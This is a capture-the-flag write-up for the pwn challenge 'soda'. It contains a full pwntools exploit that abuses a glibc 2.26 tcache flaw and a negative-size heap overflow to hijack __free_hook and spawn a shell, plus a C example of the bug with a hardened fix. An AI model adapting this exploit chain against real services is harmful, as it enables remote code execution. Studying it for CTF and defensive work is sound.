Key points:
- CVE-2017-17426
- tcache bin attack
Solution:
First, the program does not check whether size is negative when allocating a chunk. With CVE-2017-17426 (the glibc version is 2.26), a negative size still gets a chunk taken from tcache, and because size is converted to an unsigned integer when the content is read, this gives a heap overflow. The rest is the standard heap-overflow exploitation: create overlapping chunks, then use a tcache attack to hijack free_hook to system, and free a chunk containing "/bin/sh\x00" to get a shell.
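As an added illustration (not the challenge binary and not the author's exploit), the C below reconstructs the allocation pattern the writeup describes, a signed size handed to malloc and later used as an unsigned length, next to a hardened add routine that range-checks the size before it reaches the allocator. MAX_NOTE_SIZE and the note structure are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Assumed upper bound on one note, chosen for this example only. */
#define MAX_NOTE_SIZE 0x1000

struct note { char *data; size_t len; };

/* The conversion at the root of the bug: the program reads size as a signed
 * int and hands it to malloc() and to the read length, both of which take
 * size_t, so -1 becomes SIZE_MAX. On glibc 2.26 (CVE-2017-17426) such a
 * request could still be served from tcache, and the unsigned read length
 * then overflowed the small chunk that came back. */
size_t as_alloc_length(int size)
{
    return (size_t)size;
}

/* Hardened variant: validate the size before it reaches malloc() or any copy
 * length, and record the allocated length so every later write is bounded. */
int add_note(struct note *n, long size, const char *src, size_t src_len)
{
    if (size <= 0 || size > MAX_NOTE_SIZE)
        return -1;                      /* reject negative, zero, oversized */
    n->data = calloc(1, (size_t)size);
    if (n->data == NULL)
        return -1;
    n->len = (size_t)size;
    size_t copy = src_len < n->len ? src_len : n->len;  /* never past n->len */
    memcpy(n->data, src, copy);
    return 0;
}

void free_note(struct note *n)
{
    free(n->data);
    n->data = NULL;                     /* no dangling pointer for a later free */
    n->len = 0;
}

int main(void)
{
    struct note n = { NULL, 0 };
    printf("size -1 becomes %zu bytes\n", as_alloc_length(-1));
    printf("add_note(-1): %d\n", add_note(&n, -1, "aaaa", 4));
    printf("add_note(0x18): %d\n", add_note(&n, 0x18, "aaaa", 4));
    free_note(&n);
    return 0;
}
```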
The exploit is below:
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *

context.log_level = 'debug'
binary = './soda'
elf = ELF('./soda')
libc = ELF("./libc.so.6")
context.binary = binary

DEBUG = 0
if DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "127.0.0.1"
    port = 9999
    p = remote(host, port)
if DEBUG == 2:
    host = ""
    port = 0
    user = ""
    passwd = ""
    p = ssh(host, port, user, passwd)

l64 = lambda: u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))
l32 = lambda: u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))
sla = lambda a, b: p.sendlineafter(str(a), str(b))
sa = lambda a, b: p.sendafter(str(a), str(b))
lg = lambda name, data: p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda: p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a: p.recvuntil(str(a))

def cmd(idx):
    sla(">> ", str(idx))

def add(size, payload):
    cmd(1)
    sla(":\n", str(size))
    sa(":\n", payload)

def free(idx):
    cmd(2)
    sla(":\n", str(idx))

def free1(idx):
    cmd(2)
    sla(":", str(idx))

def add1(size, payload):
    cmd(1)
    sla(":", str(size))
    sa(":", payload)

def exp():
    add(0x18, "aaaa")
    add(0xff, 'aaaa')
    free(1)
    add(0xf0, "aaaa")
    free(1)
    add(0xe0, "aaaa")
    free(1)
    add(0xd0, 'aaaa')
    free(1)
    add(0xc0, "aaaa")
    free(1)
    add(0xb0, "aaaa")
    free(1)
    free(0)
    add(0xff, "aaa")
    # chunk overflow
    add(str(-1), "a" * 0x18 + p64(0x4b1))
    free(0)
    add(0xff, "aaa")
    add(0x38, p16(0x2720))
    # gdb.attach(p)
    free(1)
    add(0xf0, "aaa")
    # leak libc_base
    add(0xf0, p64(0xfbad1800) + p64(0) * 3 + p8(0x88))
    libc_base = l64() - libc.sym["_IO_2_1_stdin_"]
    lg("libc_base", libc_base)
    # tcache attack
    free1(0)
    free1(1)
    free1(2)
    add1(0x38, p64(libc_base + libc.sym["__free_hook"]))
    add1(0x38, "/bin/sh\x00")
    add1(0x38, p64(libc_base + libc.sym["system"]))
    free1(1)
    p.sendline("cat flag")
    p.interactive()

while True:
    p = remote(host, port)
    try:
        exp()
    except:
        p.close()
```
This article was first published on the WeChat public account 胖哈勃: 【迎中秋】公开赛writeup|Pwn-soda